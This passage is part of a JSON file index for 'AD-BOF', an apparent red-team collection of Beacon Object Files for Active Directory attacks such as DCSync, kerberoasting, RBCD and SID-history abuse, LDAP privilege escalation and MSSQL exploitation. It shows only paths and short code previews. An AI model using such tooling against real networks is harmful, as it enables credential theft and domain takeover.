"preview": "//+--------------------------------------------------------------------------\n//\n// Microsoft Windows\n// Copyright (C) M"
},
{
"path": "AD-BOF/ADCS-BOF/src/request/certenroll.h",
"chars": 1158927,
"preview": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler versi"
},
{
"path": "AD-BOF/ADCS-BOF/src/request/entry.c",
"chars": 2931,
"preview": "#include <windows.h>\n#include <stdio.h>\n#include \"beacon.h\"\n#include \"bofdefs.h\"\n#include \"base.c\"\n#include \"adcs_reques"
},
{
"path": "AD-BOF/ADCS-BOF/src/request_on_behalf/CertCli.h",
"chars": 62669,
"preview": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler versi"
},
{
"path": "AD-BOF/ADCS-BOF/src/request_on_behalf/CertPol.h",
"chars": 19759,
"preview": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler versi"
},
{
"path": "AD-BOF/ADCS-BOF/src/request_on_behalf/base.c",
"chars": 8753,
"preview": "#include <windows.h>\n#include \"bofdefs.h\"\n#include \"beacon.h\"\n#ifndef bufsize\n#define bufsize 8192\n#endif\n\n//#pragma GCC"
},
{
"path": "AD-BOF/ADCS-BOF/src/request_on_behalf/certenroll.h",
"chars": 1158927,
"preview": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler versi"
},
{
"path": "AD-BOF/ADCS-BOF/src/request_on_behalf/entry.c",
"chars": 18871,
"preview": "#include <windows.h>\n#include <stdio.h>\n#include <oleauto.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <combaseapi"
},
{
"path": "AD-BOF/ADCS-BOF/src/shadow/certi_shadow.c",
"chars": 54763,
"preview": "/* Prevent winsock.h/winsock2.h conflict */\n#define WIN32_LEAN_AND_MEAN\n#define _WINSOCK_DEPRECATED_NO_WARNINGS\n\n/* Use "
},
{
"path": "AD-BOF/CMakeLists.txt",
"chars": 2408,
"preview": "cmake_minimum_required(VERSION 3.16)\n#project(AD-BOF C)\n\nset(CMAKE_C_STANDARD 99)\n\n# Include directories\ninclude_directo"
},
{
"path": "AD-BOF/DCSync-BOF/LICENSE",
"chars": 1062,
"preview": "MIT License\n\nCopyright (c) 2025 Polar\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof t"
},
{
"path": "AD-BOF/DCSync-BOF/Makefile",
"chars": 1803,
"preview": "CC = x86_64-w64-mingw32-gcc\nLD = x86_64-w64-mingw32-ld\nSTRIP = x86_64-w64-mingw32-strip\n\nCFLAGS_BASE = -I. -Os -masm=int"
},
{
"path": "AD-BOF/DCSync-BOF/README.md",
"chars": 2367,
"preview": "# DCSync BOF\n\nA Beacon Object File (BOF) implementation of the DCSync attack for extracting credential material from Act"
},
{
"path": "AD-BOF/DCSync-BOF/_include/beacon.h",
"chars": 16443,
"preview": "/*\n * Beacon Object Files (BOF)\n * -------------------------\n * A Beacon Object File is a light-weight post exploitation"
},
{
"path": "AD-BOF/DCSync-BOF/_include/dcsync.h",
"chars": 13619,
"preview": "/*\n * DCSync BOF - Common Header\n * \n * Shared type definitions, constants, and function declarations\n * for the DCSync "
},
{
"path": "AD-BOF/DCSync-BOF/_include/ldap_common.h",
"chars": 9020,
"preview": "#ifndef LDAP_COMMON_H\n#define LDAP_COMMON_H\n\n#include <windows.h>\n\n// LDAP structures and constants\ntypedef struct ldap "
},
{
"path": "AD-BOF/DCSync-BOF/drsuapi/ms-drsr-custom.c",
"chars": 248225,
"preview": "/*\n * Minimal RPC stub for DCSync \n * Format strings extracted from ms-drsr_c.c (full MIDL-generated stub)\n * \n * Key o"
},
{
"path": "AD-BOF/DCSync-BOF/drsuapi/ms-drsr.h",
"chars": 57837,
"preview": "\r\n\r\n/* Compiler settings for ms-drsr.idl:\r\n Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0628 \r\n pro"
},
{
"path": "AD-BOF/DCSync-BOF/src/dcsync-all.c",
"chars": 42605,
"preview": "#include \"../_include/dcsync.h\"\n#include \"../_include/beacon.h\"\n\n#include \"../util/ldap_common.c\"\n#include \"../util/ldap"
},
{
"path": "AD-BOF/DCSync-BOF/src/dcsync-single.c",
"chars": 42751,
"preview": "#include \"../_include/dcsync.h\"\n#include \"../_include/beacon.h\"\n\n#include \"../util/ldap_common.c\"\n\n\nvoid BytesToHex(cons"
},
{
"path": "AD-BOF/DCSync-BOF/util/ldap_common.c",
"chars": 15850,
"preview": "#include <windows.h>\n#include \"../_include/ldap_common.h\"\n\n// Import required MSVCRT functions\nDECLSPEC_IMPORT int __cde"
},
{
"path": "AD-BOF/DCSync-BOF/util/ldap_syncall.c",
"chars": 5225,
"preview": "// LDAP utilities for enumerating all users in DCSync-All BOF\n\n#include <windows.h>\n#include \"../_include/ldap_common.h\""
},
{
"path": "AD-BOF/DCSync-BOF/util/rpc-adapter.c",
"chars": 796,
"preview": "//\n// RPC Stub Adapter for BOF Environment\n//\n// Provides the necessary functions for MIDL-generated RPC stubs\n// to wor"
},
{
"path": "AD-BOF/Kerbeus-BOF/CMakeLists.txt",
"chars": 5771,
"preview": "cmake_minimum_required(VERSION 3.16)\n\nset(CMAKE_C_STANDARD 99)\n\n# Include directories\ninclude_directories(\n ${CMAKE_S"
},
{
"path": "AD-BOF/Kerbeus-BOF/Makefile",
"chars": 2954,
"preview": "CC64 = x86_64-w64-mingw32-gcc\nSTRIP64 = x86_64-w64-mingw32-strip --strip-unneeded\nCFLAGS = -I ./ -w -Wno-incompatible-po"
},
{
"path": "AD-BOF/Kerbeus-BOF/README.md",
"chars": 12722,
"preview": "# Kerbeus-BOF\n\n----\n\nBeacon Object Files for Kerberos abuse. This is an implementation of some important features of the"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/asn_convert.c",
"chars": 3892,
"preview": "#pragma once\n#include \"functions.c\"\n\nint AsnToBytesEncode5(AsnElt* a, int start, int end, byte* dst, int dstOff);\n\nint V"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/asn_decode.c",
"chars": 31922,
"preview": "#include \"asn_convert.c\"\n\nbool BytesToAsnDecode9(byte* buf, int off, int maxLen, int* tc, int* tv, bool* cons, int* valO"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/asn_encode.c",
"chars": 55998,
"preview": "#include \"asn_convert.c\"\n#include \"crypt_enc.c\"\n\nsize_t my_wcslen(const wchar_t* str) {\n size_t len = 0;\n while (*"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/beacon.h",
"chars": 16443,
"preview": "/*\n * Beacon Object Files (BOF)\n * -------------------------\n * A Beacon Object File is a light-weight post exploitation"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/connection.c",
"chars": 3295,
"preview": "#include \"functions.c\"\n\nUINT my_htonl(UINT hostlong) {\n static const int endianness_test = 1;\n if (*((char*)&endia"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/crypt_b64.c",
"chars": 2643,
"preview": "#pragma once\n#include \"functions.c\"\n\nchar* base64_encode(byte* input, size_t input_len) {\n char base64_chars[] = \"ABC"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/crypt_checksum.c",
"chars": 770,
"preview": "#pragma once\n#include \"_include/functions.c\"\n\nBOOL checksum(byte* key, int key_length, byte* data, int data_length, int "
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/crypt_dec.c",
"chars": 762,
"preview": "#pragma once\n#include \"functions.c\"\n\nBOOL decrypt(byte* key, DWORD eType, DWORD keyUsage, byte* data, int dataSize, byte"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/crypt_enc.c",
"chars": 1087,
"preview": "#pragma once\n#include \"functions.c\"\n\nBOOL encrypt(byte* rawBytes, int rawSize, byte* key, DWORD eType, int keyUsage, byt"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/crypt_key.c",
"chars": 8147,
"preview": "#pragma once\n#include \"functions.c\"\n\nBOOL char2unicode(char* source, UNICODE_STRING* result) {\n STRING ansiPassword;\n"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/functions.c",
"chars": 22265,
"preview": "#pragma once\n#define SECURITY_WIN32\n\n#include \"kerb_struct.h\"\n\n#include <winsock2.h>\n#include <ws2tcpip.h>\n#include <std"
},
{
"path": "AD-BOF/Kerbeus-BOF/_include/kerb_struct.h",
"chars": 19560,
"preview": "#pragma once\n\ntypedef unsigned int uint;\ntypedef unsigned char byte;\n\n#if !(__GNUC__ >= 15)\ntypedef int bool;\n#define tr"
},
{
"path": "AD-BOF/Kerbeus-BOF/asktgs/asktgs.c",
"chars": 48064,
"preview": "#include \"_include/asn_decode.c\"\n#include \"_include/asn_encode.c\"\n#include \"_include/crypt_b64.c\"\n#include \"_include/cry"
},
{
"path": "AD-BOF/Kerbeus-BOF/asktgt/asktgt.c",
"chars": 25706,
"preview": "#include \"_include/asn_decode.c\"\n#include \"_include/asn_encode.c\"\n#include \"_include/crypt_b64.c\"\n#include \"_include/cry"
},
{
"path": "AD-BOF/Kerbeus-BOF/asreproasting/asreproasting.c",
"chars": 10760,
"preview": "#include \"_include/functions.c\"\n#include \"_include/asn_decode.c\"\n#include \"_include/asn_encode.c\"\n#include \"_include/con"
},
{
"path": "AD-BOF/Kerbeus-BOF/changepw/changepw.c",
"chars": 11730,
"preview": "#include \"_include/asn_decode.c\"\n#include \"_include/asn_encode.c\"\n#include \"_include/crypt_b64.c\"\n#include \"_include/cry"
},
{
"path": "AD-BOF/Kerbeus-BOF/describe/describe.c",
"chars": 4303,
"preview": "#include \"_include/asn_decode.c\"\n#include \"_include/crypt_b64.c\"\n\nvoid DisplayTicket( KRB_CRED cred, int indentLevel ) {"
},
{
"path": "AD-BOF/Kerbeus-BOF/hash/hash.c",
"chars": 2567,
"preview": "#include \"_include/functions.c\"\n#include \"_include/crypt_key.c\"\n\nvoid GenerateHashes(char* user, char* domain, char* pas"
},
{
"path": "AD-BOF/Kerbeus-BOF/kerberoasting/kerberoasting.c",
"chars": 25864,
"preview": "#include \"_include/asn_encode.c\"\n#include \"_include/asn_decode.c\"\n#include \"_include/crypt_b64.c\"\n#include \"_include/cry"
},
{
"path": "AD-BOF/Kerbeus-BOF/kerbeus.axs",
"chars": 11063,
"preview": "var metadata = {\n name: \"Kerbeus-BOF\",\n description: \"Kerberos Exploitation BOFs\"\n};\n\nlet _cmd_asreproasting = ax."
},
{
"path": "AD-BOF/Kerbeus-BOF/klist/klist.c",
"chars": 20659,
"preview": "#include \"_include/functions.c\"\n\nSYSTEMTIME ConvertToSystemtime(LARGE_INTEGER li) {\n FILETIME ft;\n SYSTEMTIME st_u"
},
{
"path": "AD-BOF/Kerbeus-BOF/ptt/ptt.c",
"chars": 8017,
"preview": "#include \"_include/functions.c\"\n\nint base64_decode_char(char c) {\n if (c >= 'A' && c <= 'Z')\n return c - 'A';\n"
},
{
"path": "AD-BOF/Kerbeus-BOF/purge/purge.c",
"chars": 5977,
"preview": "#include \"_include/functions.c\"\n\nHANDLE GetCurrentToken(DWORD DesiredAccess) {\n HANDLE hCurrentToken = NULL;\n if ("
},
{
"path": "AD-BOF/Kerbeus-BOF/renew/renew.c",
"chars": 17808,
"preview": "#include \"_include/asn_encode.c\"\n#include \"_include/asn_decode.c\"\n#include \"_include/crypt_b64.c\"\n#include \"_include/cry"
},
{
"path": "AD-BOF/Kerbeus-BOF/s4u/cross_s4u.c",
"chars": 75791,
"preview": "#include \"_include/asn_encode.c\"\n#include \"_include/asn_decode.c\"\n#include \"_include/crypt_b64.c\"\n#include \"_include/cry"
},
{
"path": "AD-BOF/Kerbeus-BOF/s4u/s4u.c",
"chars": 58661,
"preview": "#include \"_include/asn_encode.c\"\n#include \"_include/asn_decode.c\"\n#include \"_include/crypt_b64.c\"\n#include \"_include/cry"
},
{
"path": "AD-BOF/Kerbeus-BOF/tgtdeleg/tgtdeleg.c",
"chars": 12998,
"preview": "#include \"_include/asn_encode.c\"\n#include \"_include/asn_decode.c\"\n#include \"_include/crypt_b64.c\"\n#include \"_include/cry"
},
{
"path": "AD-BOF/LDAP-BOF/CMakeLists.txt",
"chars": 5455,
"preview": "cmake_minimum_required(VERSION 3.16)\n\nset(CMAKE_C_STANDARD 99)\n\n# Include directories\ninclude_directories(\n# ${CMAKE_"
},
{
"path": "AD-BOF/LDAP-BOF/LDAP.axs",
"chars": 72911,
"preview": "var metadata = {\n name: \"LDAP-BOF\",\n description: \"LDAP Exploitation BOFs\"\n};\n\n// ================================"
},
{
"path": "AD-BOF/LDAP-BOF/LICENSE",
"chars": 1062,
"preview": "MIT License\n\nCopyright (c) 2025 Polar\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof t"
},
{
"path": "AD-BOF/LDAP-BOF/Makefile",
"chars": 7171,
"preview": "# LDAP BOF Collection Makefile\nCC = x86_64-w64-mingw32-gcc\nSTRIP = x86_64-w64-mingw32-strip --strip-unneeded\nCFLAGS = -I"
},
{
"path": "AD-BOF/LDAP-BOF/README.md",
"chars": 16755,
"preview": "# LDAP BOF Collection\n\nCollection of many LDAP bofs for domain enumeration and privilege escalation. This project was cr"
},
{
"path": "AD-BOF/LDAP-BOF/_include/acl_common.h",
"chars": 14536,
"preview": "#ifndef ACL_COMMON_H\n#define ACL_COMMON_H\n\n#include <windows.h>\n#include <aclapi.h>\n\n// ================================"
},
{
"path": "AD-BOF/LDAP-BOF/_include/beacon.h",
"chars": 16443,
"preview": "/*\n * Beacon Object Files (BOF)\n * -------------------------\n * A Beacon Object File is a light-weight post exploitation"
},
{
"path": "AD-BOF/LDAP-BOF/_include/ldap_common.h",
"chars": 10094,
"preview": "#ifndef LDAP_COMMON_H\n#define LDAP_COMMON_H\n\n#include <windows.h>\n\n// LDAP timeval structure\nstruct l_timeval {\n LONG"
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-ace.c",
"chars": 17226,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n#include \"acl_common.c\"\n\nDECLSPEC_IMPORT void* __cdecl"
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-attribute.c",
"chars": 3400,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-computer.c",
"chars": 8447,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-delegation.c",
"chars": 3170,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-group.c",
"chars": 7981,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\n// Group type constants\n#define GROUP_TYPE_SECURITY_G"
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-groupmember.c",
"chars": 5542,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-ou.c",
"chars": 6759,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-rbcd.c",
"chars": 16714,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n#include \"acl_common.c\"\n\nvoid go(char *args, int alen)"
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-sidhistory.c",
"chars": 15091,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nDECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char"
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-spn.c",
"chars": 3099,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-uac.c",
"chars": 7033,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nDECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char"
},
{
"path": "AD-BOF/LDAP-BOF/src/add/add-user.c",
"chars": 7619,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/common/acl_common.c",
"chars": 64098,
"preview": "// acl_common.c - Shared ACL/Security Descriptor utilities for BOF operations\n// This file should be #included in each B"
},
{
"path": "AD-BOF/LDAP-BOF/src/common/ldap_common.c",
"chars": 22143,
"preview": "// ldap_common.c - Shared LDAP utilities for BOF operations\n// This file should be #included in each BOF that uses these"
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-acl.c",
"chars": 4107,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n#include \"acl_common.c\"\n\nvoid go(char *args, int alen)"
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-attribute.c",
"chars": 4627,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-computers.c",
"chars": 3721,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-delegation.c",
"chars": 5021,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nDECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char"
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-domaininfo.c",
"chars": 4231,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-groupmembers.c",
"chars": 3553,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-groups.c",
"chars": 3686,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-maq.c",
"chars": 2250,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-object.c",
"chars": 4951,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-rbcd.c",
"chars": 4836,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n#include \"acl_common.c\"\n\nvoid go(char *args, int alen)"
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-spn.c",
"chars": 3615,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-uac.c",
"chars": 6063,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nDECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char"
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-usergroups.c",
"chars": 3606,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-users.c",
"chars": 3730,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/get/get-writable.c",
"chars": 5345,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/move/move-object.c",
"chars": 14026,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nDECLSPEC_IMPORT ULONG WLDAP32$ldap_rename_ext_s(\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/remove/remove-ace.c",
"chars": 23279,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n#include \"acl_common.c\"\n\nDECLSPEC_IMPORT int __cdecl M"
},
{
"path": "AD-BOF/LDAP-BOF/src/remove/remove-attribute.c",
"chars": 2972,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/remove/remove-delegation.c",
"chars": 2776,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/remove/remove-groupmember.c",
"chars": 5255,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/remove/remove-object.c",
"chars": 3291,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/remove/remove-rbcd.c",
"chars": 19857,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n#include \"acl_common.c\"\n\n// Helper function to check i"
},
{
"path": "AD-BOF/LDAP-BOF/src/remove/remove-spn.c",
"chars": 2747,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/remove/remove-uac.c",
"chars": 6831,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nDECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char"
},
{
"path": "AD-BOF/LDAP-BOF/src/set/set-attribute.c",
"chars": 2968,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/set/set-delegation.c",
"chars": 2818,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/set/set-owner.c",
"chars": 6858,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n#include \"acl_common.c\"\n\nvoid go(char *args, int alen)"
},
{
"path": "AD-BOF/LDAP-BOF/src/set/set-password.c",
"chars": 6703,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/set/set-spn.c",
"chars": 2789,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nvoid go(char *args, int alen) {\n datap parser;\n "
},
{
"path": "AD-BOF/LDAP-BOF/src/set/set-uac.c",
"chars": 5984,
"preview": "#include <windows.h>\n#include \"beacon.h\"\n#include \"ldap_common.c\"\n\nDECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char"
},
{
"path": "AD-BOF/Makefile",
"chars": 1805,
"preview": "\nCC64 = x86_64-w64-mingw32-gcc\nSTRIP64 = x86_64-w64-mingw32-strip --strip-unneeded\nCFLAGS = -I ../_include -Os -masm=int"
},
{
"path": "AD-BOF/README.md",
"chars": 3865,
"preview": "# AD-BOF\n\nA BOFs that contains common enumeration and attack methods for Windows Active Directory.\n\n\n\n!["
},
{
"path": "AD-BOF/RelayInformer/Makefile",
"chars": 1182,
"preview": "CC64 = x86_64-w64-mingw32-gcc\nSTRIP64 = x86_64-w64-mingw32-strip --strip-unneeded\nCFLAGS = -I common -w -Wno-incompatibl"
},
{
"path": "AD-BOF/RelayInformer/README.md",
"chars": 4213,
"preview": "# Relay Informer BOFs\nBeacon object files that allow an operator to determine EPA enforcement from a beacon's logon sess"
},
{
"path": "AD-BOF/RelayInformer/RelayInformer.axs",
"chars": 3171,
"preview": "var metadata = {\n name: \"RelayInformer-BOF\",\n description: \"RelayInformer BOFs\"\n};\n\nlet _cmd_informer_http = ax.cr"
},
{
"path": "AD-BOF/RelayInformer/common/base.c",
"chars": 7310,
"preview": "#include \"bofdefs.h\"\n#include \"beacon.h\"\n#include \"time.h\"\n#ifndef bufsize\n#define bufsize 8192\n#endif\n\n\nchar * output _"
},
{
"path": "AD-BOF/RelayInformer/common/beacon.h",
"chars": 2599,
"preview": "/*\n * Beacon Object Files (BOF)\n * -------------------------\n * A Beacon Object File is a light-weight post exploitation"
},
{
"path": "AD-BOF/RelayInformer/common/bofdefs.h",
"chars": 17445,
"preview": "#pragma once\n#pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen)\n#include <winsock2.h>\n#include <ws2tcpip.h>"
},
{
"path": "AD-BOF/RelayInformer/common/hwbp.c",
"chars": 32812,
"preview": "// Public API\n// - HWBP_SetOnAddress: set a hardware breakpoint (execute) in DR0-DR3 on current thread\n// - HWBP_Clear: "
},
{
"path": "AD-BOF/RelayInformer/common/sql.c",
"chars": 7805,
"preview": "#include <windows.h>\n#include <sql.h>\n#include <odbcss.h>\n\n\n//\n// prints a SQL error message\n//\nSQLINTEGER ShowError(uns"
},
{
"path": "AD-BOF/RelayInformer/relay-informer-http/entry.c",
"chars": 8735,
"preview": "#include \"bofdefs.h\"\n#include \"base.c\"\n\nstatic wchar_t g_fakeSpnW[64] = L\"HTTP/relay.informer\";\n#include \"hwbp.c\"\n\n// Gl"
},
{
"path": "AD-BOF/RelayInformer/relay-informer-ldap/entry.c",
"chars": 6826,
"preview": "#include \"bofdefs.h\"\n#include \"base.c\"\n\nstatic wchar_t g_fakeSpnW[64] = L\"LDAP/relay.informer\";\n\n#include \"hwbp.c\"\n\nVERI"
},
{
"path": "AD-BOF/RelayInformer/relay-informer-mssql/entry.c",
"chars": 4146,
"preview": "#include \"bofdefs.h\"\n#include \"base.c\"\n#include \"sql.c\"\n\nstatic const wchar_t g_fakeSpnW[] = L\"MSSQLSvc/relay.informer\";"
},
{
"path": "AD-BOF/RelayInformer/relay-informer-smb/entry.c",
"chars": 7039,
"preview": "//\n// Claude to the rescue\n//\n\n#include \"bofdefs.h\"\n#include \"base.c\"\n\n// Minimal SMB2 NEGOTIATE probe to read server Se"
},
{
"path": "AD-BOF/SQL-BOF/CMakeLists.txt",
"chars": 2718,
"preview": "cmake_minimum_required(VERSION 3.16)\n\nset(CMAKE_C_STANDARD 99)\n\n# Include directories\ninclude_directories(\n ${CMAKE_S"
},
{
"path": "AD-BOF/SQL-BOF/LICENSE",
"chars": 18092,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 2, June 1991\n\n Copyright (C) 1989, 1991 Fr"
},
{
"path": "AD-BOF/SQL-BOF/Makefile",
"chars": 3596,
"preview": "CC64 = x86_64-w64-mingw32-gcc\nSTRIP64 = x86_64-w64-mingw32-strip --strip-unneeded\nCFLAGS = -I ./src/common -w -Wno-incom"
},
{
"path": "AD-BOF/SQL-BOF/README.md",
"chars": 4851,
"preview": "# SQL-BOF\nA library of beacon object files to interact with remote SQL servers and data. This collection is templated of"
},
{
"path": "AD-BOF/SQL-BOF/SQL.axs",
"chars": 44855,
"preview": "var metadata = {\n name: \"MSSQL-BOF\",\n description: \"Microsof SQL Server Exploitation BOFs\"\n};\n\nvar _cmd_1434udp = "
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/1434udp/entry.c",
"chars": 3154,
"preview": "#include \"bofdefs.h\"\n#include \"base.c\"\n\nvoid UdpEnumInfo(char* serverIp)\n{\n\tint port = 1434;\n\tint timeout = 1000;\n WS"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/adsi/entry.c",
"chars": 10279,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"ldapserver.h\"\n#include \"sql.c\"\n#include \"sql_clr.c\"\n#include \"sql_modul"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/adsi/ldapserver.h",
"chars": 25942,
"preview": "//\n// This is the .NET assembly for an LDAP server in SQL byte format\n//\nchar* LDAP_DLL_BYTES = \"4D5A9000030000000400000"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/agentcmd/entry.c",
"chars": 3906,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n#include \"sql_agent.c\"\n#include \"sql_modules.c\"\n\nvoid ExecuteAge"
},
{
"path": "AD-BOF/SQL-BOF/src/SQL/agentstatus/entry.c",
"chars": 2421,
"preview": "#include \"base.c\"\n#include \"bofdefs.h\"\n#include \"sql.c\"\n#include \"sql_agent.c\"\n#include \"sql_modules.c\"\n\nvoid CheckAgent"
},
{
